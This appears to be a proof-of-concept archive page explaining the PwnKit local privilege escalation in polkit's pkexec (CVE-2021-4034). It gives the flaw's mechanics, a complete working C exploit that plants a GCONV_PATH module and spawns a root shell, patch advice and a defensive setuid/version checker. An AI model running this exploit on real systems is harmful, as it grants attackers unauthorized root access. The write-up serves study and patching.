Related vulnerability
Title:
polkit buffer error vulnerability
(CVE-2021-4034)
Description: polkit is a component that controls system-wide privileges in Unix-like operating systems. By defining and auditing permission rules, it mediates communication between processes of different privilege levels. The pkexec application in polkit has a buffer error vulnerability; an attacker can exploit it by crafting environment variables to make pkexec execute arbitrary code. After a successful attack, an unprivileged user on the target machine may obtain administrative privileges, which results in local privilege escalation.
Description
Local Privilege Escalation (LPE) vulnerability in Polkit - Pwnkit
Introduction
# Pwnkit Vulnerability - CVE-2021-4034 :green_book:
### Introduction
Discovered in 2021 but announced and disclosed in January 2022, **CVE-2021-4034** was affectionately named Pwnkit. It is present in all versions of the **Policy Toolkit - Polkit package** in practically all Linux distributions. In short, this vulnerability allows any unprivileged local attacker to elevate their access to OS administrator (root).
> [!IMPORTANT]
> We can find this vulnerability in pkexec version 0.105 or earlier.
Even though it is a highly critical CVE, classified with a **<font color="red">CVSS score of 7.8 points</font>** according to **NIST.GOV**, it can only be exploited locally; it is not possible to exploit it remotely (for example through web access).
<p align="center">
<img width="400" height="300" src="./img/1.png">
</p>
### What is Polkit :question:
Polkit acts as the Linux authorization system. When a low-privilege user needs to perform a task that requires high privileges (admin, for example), polkit checks whether that user has the required permission.
For example, with the pkexec utility we can invoke polkit, which checks the permission and prompts for a password if the user does not already have it, as in the example below:
<p align="center">
<img width="500" height="190" src="./img/2.png">
</p>
## Explaining the Exploitation :warning:
As shown above, the Pwnkit vulnerability lives in pkexec, in the permission-checking process. pkexec does not handle its parameters safely when it is run from the command line (CLI), which lets an attacker manipulate the environment, and a flaw called an **"Out-of-Bounds Write"** occurs.
pkexec parses whatever command-line arguments we pass it using a for-loop that starts at index 1, skipping the program name to reach the first real argument. The program name is irrelevant to argument parsing, so the index is simply offset to ignore it.
So if we do not pass any arguments, the index still starts at 1.
Let's create an example below.
```c
for (n = 1; n < number_of_arguments; n++) {
}
```
If the number of arguments is 0, then `n` is never less than the number of arguments. As such, `n` stays equal to 1 and the loop is **<font color="green">Bypassed Completely</font>**: its body never runs.
Since there are no command-line arguments, there is no argument at index `n`; instead the program reads and overwrites the next thing in memory, which happens to be the first entry in the list of environment variables when the program is started with the C function execve(). In other words, by passing pkexec an empty argument list, we can force it to overwrite an environment variable.
## Let's Explore !!! :pencil2:
There are several ways and various scripts on the internet that easily exploit this vulnerability. To save time, we will use a C exploit for this vulnerability from our friend **Arthepsy's** repository.
This script abuses the ```GCONV_PATH``` variable to load a shared object that launches /bin/sh as root.
[Arthepsy - CVE-2021-4034 - exploit.c](https://github.com/arthepsy/CVE-2021-4034)
Before running the script, let's check our current access on the vulnerable host.
<p align="center">
<img width="500" height="100" src="./img/3.png">
</p>
We are user 1000 (not root) and cannot perform administrator-only tasks such as useradd.
* Let's Burn :fire:
<p align="center">
<img width="500" height="150" src="./img/4.png">
</p>
We obtained root access and were able to run commands such as useradd (the error shown relates to a different problem, but the process ran as root).
Done :heavy_check_mark:
## Just a Little More Analysis :bulb:
To conclude, let's take a quick look at the exploit script:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell =
    "#include <stdio.h>\n"
    "#include <stdlib.h>\n"
    "#include <unistd.h>\n\n"
    "void gconv() {}\n"
    "void gconv_init() {\n"
    "  setuid(0); setgid(0);\n"
    "  seteuid(0); setegid(0);\n"
    "  system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
    "  exit(0);\n"
    "}";

int main(int argc, char *argv[]) {
    FILE *fp;
    system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
    system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
    fp = fopen("pwnkit/pwnkit.c", "w");
    fprintf(fp, "%s", shell);
    fclose(fp);
    system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
    char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
    execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
```
It exploits the pkexec argument handling discussed above, so that a ```GCONV_PATH``` entry is written into the environment and the shared object it points to calls setuid(0) (root) and launches /bin/sh.
## Patching :white_check_mark:
Fixed versions are already available from the OS package repositories; running ```sudo apt update && sudo apt upgrade``` is enough to fix this problem on your system.
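As an added check, not part of the original README or the exploit repository, the C program below looks for the two conditions the exploit relies on: pkexec installed with the setuid bit, and a version string at or below 0.105 as printed by `pkexec --version`. The path /usr/bin/pkexec and the `pkexec version X.Y` output format are assumptions. Distributions backport the fix without changing the version number, so a version hit here is a prompt to check the package changelog, not proof of exposure; the setuid check is the decisive one, because without the setuid bit there is nothing to escalate through.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* Returns 1 if path carries the setuid bit, 0 if not, -1 if stat() fails. */
int has_setuid_bit(const char *path) {
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* Parses a line such as "pkexec version 0.105" (assumed format) into
 * major/minor; returns 1 on success, 0 if the line does not match. */
int parse_pkexec_version(const char *line, int *major, int *minor) {
    return sscanf(line, "pkexec version %d.%d", major, minor) == 2;
}

/* Upstream versions 0.105 and earlier shipped without the fix. */
int version_at_or_below_0_105(int major, int minor) {
    return major == 0 && minor <= 105;
}

/* Verdict from a version line: 1 = unpatched upstream number,
 * 0 = newer than 0.105, -1 = line not recognised. */
int version_line_looks_vulnerable(const char *line) {
    int major, minor;
    if (!parse_pkexec_version(line, &major, &minor))
        return -1;
    return version_at_or_below_0_105(major, minor);
}

int main(void) {
    const char *path = "/usr/bin/pkexec";  /* assumed install location */
    char line[128];
    FILE *fp;

    switch (has_setuid_bit(path)) {
    case -1: printf("%s: not found\n", path); return 0;
    case 0:  printf("%s: setuid bit absent, exploit path closed\n", path); break;
    default: printf("%s: setuid bit present\n", path); break;
    }

    /* Version is informational only: distro backports keep the old number. */
    fp = popen("/usr/bin/pkexec --version 2>/dev/null", "r");
    if (fp != NULL && fgets(line, sizeof line, fp) != NULL) {
        int v;
        line[strcspn(line, "\n")] = '\0';
        v = version_line_looks_vulnerable(line);
        printf("%s -> %s\n", line,
               v == 1 ? "0.105 or older: confirm a backported fix in the package changelog"
             : v == 0 ? "newer than 0.105"
                      : "unrecognised version line");
    }
    if (fp != NULL)
        pclose(fp);
    return 0;
}
```

Compile with `gcc check_pkexec.c -o check_pkexec` and run it as an ordinary user; it needs no privileges because both stat() and `pkexec --version` work unprivileged.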
File snapshot
[4.0K] /data/pocs/296ba6c130567c096c6f51979401b1869f51066a
├── [4.0K] img
│ ├── [252K] 1.png
│ ├── [ 41K] 2.png
│ ├── [ 25K] 3.png
│ └── [ 23K] 4.png
└── [5.1K] README.md
1 directory, 5 files
Notes
1. Please access the code via the original source where possible.
2. If the source is no longer available, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for local POC access. Thank you for your support.